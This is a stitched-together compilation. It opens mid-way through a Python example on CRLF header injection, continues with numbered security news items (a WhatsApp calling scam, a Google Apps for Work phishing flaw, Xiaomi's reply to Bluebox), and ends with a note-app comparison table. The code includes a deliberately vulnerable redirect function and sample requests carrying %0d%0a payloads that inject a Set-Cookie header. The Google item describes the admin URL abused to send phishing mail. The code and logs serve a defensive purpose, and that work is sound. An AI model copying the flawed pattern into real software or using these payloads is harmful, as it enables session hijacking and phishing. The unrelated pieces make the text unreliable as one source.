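    """The flawed pattern: the decoded parameter is pasted straight into Location."""
    return (b"HTTP/1.1 302 Found\r\nLocation: "
            + unquote(redirect_url).encode("latin-1") + b"\r\n\r\n")


def header_lines(response: bytes) -> List[bytes]:
    """Header lines a client would parse from a raw response (status line excluded)."""
    head = response.split(b"\r\n\r\n", 1)[0]
    return head.split(b"\r\n")[1:]


def safe_redirect_target(redirect_url: str, site_host: str = SITE_HOST) -> Optional[str]:
    """Decode once, refuse control characters, allow only local or same-host targets."""
    target = unquote(redirect_url)
    if re.search(r"[\r\n\x00]", target):
        return None                        # header injection attempt
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # a plain relative path; "//host/..." is scheme-relative and leaves the site
        if target.startswith("/") and not target.startswith("//"):
            return target
        return None
    if parts.scheme in ("http", "https") and parts.hostname == site_host:
        return target
    return None                            # open redirect to another host


# Constructed access-log lines: one benign request and two carrying %0d%0a.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Mar/2015:10:00:01 +0000] "GET /post.php?redirect_url=/news/ HTTP/1.1" 302 0',
    '10.0.0.9 - - [07/Mar/2015:10:00:02 +0000] "GET /post.php?redirect_url=/%0d%0aSet-Cookie:%20sid=x HTTP/1.1" 302 0',
    '10.0.0.9 - - [07/Mar/2015:10:00:03 +0000] "GET /redirect.php?url=http://cms.example/%0d%0a%20 HTTP/1.1" 302 0',
]

LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
WATCHED = ("redirect_url", "url")


def flag_crlf_attempts(log_lines: List[str]) -> List[str]:
    """Return request paths whose watched parameters decode to a CR or LF."""
    hits = []
    for line in log_lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        path = match.group("path")
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        suspicious = any("\r" in value or "\n" in value
                         for name in WATCHED
                         for value in params.get(name, []))
        if suspicious:
            hits.append(path)
    return hits
```

Only single percent-decoding is applied, matching what a typical server does; a log scan for double-encoded variants would need a second unquote pass.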
  22. While WhatsApp is very reserved about its new calling feature, cyber scammers are targeting WhatsApp users across the world by circulating fake messages inviting users to activate the new 'WhatsApp calling feature for Android' that infects their smartphones with malicious apps. If you receive an invitation message from any of your friends saying, "Hey, I’m inviting you to try WhatsApp Free Voice Calling feature, click here to activate now —> http://WhatsappCalling.com", BEWARE! It is a Scam.

The popular messaging app has begun rolling out its much-awaited Free Voice Calling feature — similar to other instant messaging apps like Skype and Viber — to Android users, which allows users to make voice calls using the Internet. However, for now, the free WhatsApp calling feature is invite-only and only appears to work for people running the latest version of the WhatsApp app for Android on a Google Nexus 5 phone running the latest Android 5.0.1 Lollipop.

HOW TO ENABLE WHATSAPP CALLING FEATURE

The company has not announced the WhatsApp calling feature officially, but some users claim to have used it. The report broke two months ago, when a Reddit user (pradnesh07) from India reported that the WhatsApp calling feature was activated on his Android device after he received a WhatsApp voice call from a friend. The user also posted an image of it on the discussion forum. Because it’s invite only, as we all believe, millions of users across the world are eagerly waiting to access the free voice calling feature on WhatsApp and searching the Internet for how to enable the WhatsApp calling feature for Android or iOS, and this is what scammers are taking advantage of. Cyber scammers have allegedly started circulating fake invitations containing malicious links through social media, phishing emails, WhatsApp messages and scam websites in order to spread creepy malware and adware apps.
Once users click on the link, they land to another website where they are asked to take a survey on behalf of WhatsApp. The survey forces users to download unknown applications and software that might contain malware. With more than 70 million users, WhatsApp is the widely popular and preferred chat service worldwide, both for us as well as scammers. LEARN HOW TO PROTECT YOURSELF In order to protect yourself from 'WhatsApp calling feature' scam, you need to learn that at time of writing: WhatsApp calling feature feature is currently available for Android Lollipop 5.0 version and was successfully accessible via the new version 2.11.508 of the WhatsApp. WhatsApp calling feature feature is still in the beta version. WhatsApp calling feature is not available through Google Play Store, but can be downloaded only from the official WhatsApp website on INVITE. Source
23. A critical vulnerability has been discovered in Google Apps for Work that allows hackers to abuse any website’s domain-name-based email addresses, which could then be used to send phishing emails on the company’s behalf in order to target users.

If you wish to have an email address on your own brand, one that reads like admin@yourdomain.com instead of myemail@gmail.com, you can register an account with Google Apps for Work. The Google Apps for Work service allows you to use Gmail, Drive storage, Calendar, online documents, video Hangouts and other collaborative services with your team or organization.

To get a custom-domain email service from Google, one just needs to sign up as for a normal Gmail account. Once the account is created, you can access your domain’s admin console panel in the Google Apps interface, but you cannot use any service until your domain has been verified by Google.

SENDING PHISHING MAILS FROM HIJACKED ACCOUNTS

Security researchers Patrik Fehrenbach and Behrouz Sadeghipour found that an attacker can register any unused domain (one not previously registered with the Google Apps service), for example bankofanycountry.com, with Google Apps for Work to obtain the 'admin@bankofanycountry.com' account.

Obviously, Google would not let you access the email service for 'admin@bankofanycountry.com' until domain verification has been completed, which means you can neither send any email from that account nor receive any.

However, the duo explained to The Hacker News that there is a page on Google Apps that allows the domain admin to send 'Sign in Instructions' to the organization’s users, i.e. info@bankofanycountry.com (which must be created from the panel before proceeding), by accessing the following URL directly in the browser:

https://admin.google.com/EmailLoginInstructions?userEmail=info@bankofanycountry.com

Using the compose email interface, as shown, an attacker could send any kind of phishing email containing a malicious link to the target users, in an attempt to trick them into revealing their personal information, including passwords, financial details or any other sensitive information.

BEFORE SECURITY PATCH

As shown below, the researchers successfully obtained admin@vine.com (Vine was acquired by Twitter) and sent a mail to a victim with the subject "Welcome to Twitter", which could convince users to submit their Twitter credentials to the phishing pages it links to.

The researchers reported this security and privacy issue to the search engine giant, and the company has applied what I think is a partial patch to the flaw, as it still allows an attacker to access ‘Send Sign in Instructions’ for unverified domains, but this time via apps-noreply@google.com instead of the custom email address.

AFTER SECURITY PATCH

But the consequences are still the same, because it won’t stop hackers from targeting victims. Generally, Google automatically identifies spam and suspicious emails and marks them with spam or phishing warnings, for example messages that look like they're from a legitimate source, such as your bank or Google, but are not. However, by abusing the Google vulnerability above, hackers could send phishing emails right into your inbox with no warning, as the email has been generated from Google’s own servers.

Source

Very interesting
24. Recently the mobile-security firm Bluebox claimed that the brand-new Xiaomi Mi4 LTE comes pre-installed with spyware/adware and a "forked", vulnerable version of the Android operating system on top of it; however, the company denies the claim.

Xiaomi, also known as the Apple of China, provides affordable, budget smartphones with almost all the features that an excellent smartphone provides.

On 5 March, when Bluebox researchers claimed to have discovered some critical flaws in the Mi4 LTE smartphone, Xiaomi issued a statement to The Hacker News claiming that "There are glaring inaccuracies in the Bluebox blog post" and that they were investigating the matter.

RESEARCHERS GET TROLLED BY CHINESE SELLERS

Now, Xiaomi has responded to Bluebox Labs with a lengthy denial of their claims, saying that the new Mi4 smartphone purchased by the Bluebox team in China (known as the birthplace of fake smartphones) was not an original Xiaomi smartphone but a counterfeit product. This means the Mi4 LTE smartphone owned by Bluebox was tampered with by the local Chinese shops themselves. What the heck! Chinese get trolled by Chinese.

XIAOMI DECLINES BLUEBOX CLAIMS

Xiaomi provided a detailed step-by-step explanation of each and every fact and figure:

Hardware: Xiaomi hardware experts have analysed the internal device photos provided to the company by Bluebox and confirmed that the physical hardware is markedly different from the original Mi 4 smartphone.

IMEI number: Xiaomi's after-sales team has confirmed that the IMEI on the device from Bluebox is a cloned IMEI number which has previously been used on other counterfeit Xiaomi devices in China.

Software: Xiaomi's MIUI team has also confirmed that the software installed on the device from Bluebox is not an official Xiaomi MIUI build.

The company assured its customers that their devices neither come rooted nor have any malware pre-installed.

Contrary to Bluebox's claims, the company also assured its customers that the MIUI used in its products is true Android, meaning that MIUI follows Google's Android CDD (Compatibility Definition Document) exactly and passes all Android CTS tests, which make sure a given device is fully Android compatible.

Dismissing Bluebox's findings, Xiaomi released the following statement in an email to The Hacker News:

Source
25. You will find the answer HERE

| | OneNote | Evernote | Keep |
|---|---|---|---|
| Developer | Microsoft | Evernote | Google |
| Latest Stable version | 2014 | 2014 | 2014 |
| Delivery | Web, Mobile, Desktop | Web, Mobile, Desktop | Web, Mobile |
| Windows | Yes | Yes | Online Only |
| Mac OS X | Yes | Yes | Online Only |
| Android | Yes | Yes | Yes |
| iOS | Yes | Yes | Online Only |
| Windows Phone | Yes | Yes | Online Only |
| Blackberry | Online Only | Yes | Online Only |
| # of Devices Per License | No license, unlimited | Unlimited | Unlimited |
| Packages and Cost in USD | Free | Free or Premium Available ($5 to 10 USD/user/month) | Free |
| Microsoft Office Compatibility | Can Attach | Can Attach | Can't Attach Files |
| Open Document Compatibility | Can Attach | Can Attach | Can't Attach Files |
| Portable Document Format (PDF) | Can Attach | Can Attach | Can't Attach Files |
| Autosave and Backup | Excellent | Excellent | Excellent |
| Security, Document Password Protection, Encryption | Excellent | Excellent | Excellent |
| Accessibility | Excellent | Poor | Good |
| Update Process | Excellent | Excellent | Excellent |
| Support | Good | Good | Good |
| Web Clipper App | OneNote Web Clipper | Evernote Web Clipper | Chrome App |
| News App | Several including Feedly and News 360 | Several including Feedly and News 360 | No |
| Email App | Email to OneNote, CloudMagic and Powerbot | CloudMagic and Powerbot | Gmail |
| Printing / Scanning App | Several including OfficeLens and NeatConnect | Several including ScannerPro and CamScanner | Google Drive Apps available |
| SmartPen App | Livescribe and ModNotebooks | Livescribe and ModNotebooks | No |
| Connection to Other Major Apps | IFTTT and Zapier | IFTTT and Zapier | No |
| Home Screen Display Widget | Available | Available | Available |
| Annotation / Quick Sketch App | Skitch | Skitch and Penultimate | Sketch for Keep |
| Dining / Food App | No | Evernote Food | No |
| Distraction Free App | No | Evernote Clearly | No |
| User Interface & Customization | Excellent | Excellent | Excellent |
| Text & OCR | Excellent | Excellent | Good |
| Handwriting | Excellent | Excellent | Poor |
| Images | Excellent | Excellent | Excellent |
| Audio | Excellent | Excellent | Good |
| Task Lists and Alerts / Reminders | Excellent | Excellent | Good |
| Notebooks, Tags, & Categories | Excellent | Excellent | Poor |
| References | Poor | Poor | Poor |
| Comments | Poor | Poor | Poor |
| Spelling & Grammar Check | Excellent | Excellent | Excellent |
| Printing & Exporting | Good (requires cloud printing) | Good (requires cloud printing) | Good (requires cloud printing) |
| Cloud Environment | Microsoft OneDrive | Evernote Cloud | Google Drive |
| Asynchronous Collaborative Editing | Excellent - available in free version | Good - available in Shared Notes (Premium version) or Related Notes (Business version) | Poor (share to Google+ but no collaborative editing) |
| Online to Offline Syncing & Editing | Excellent | Good in Free, Excellent in Premium | Only in the Chrome app |
| Social Sharing | with Zapier app | with Zapier app | Google+ |
| Templates | Excellent | Poor | Poor |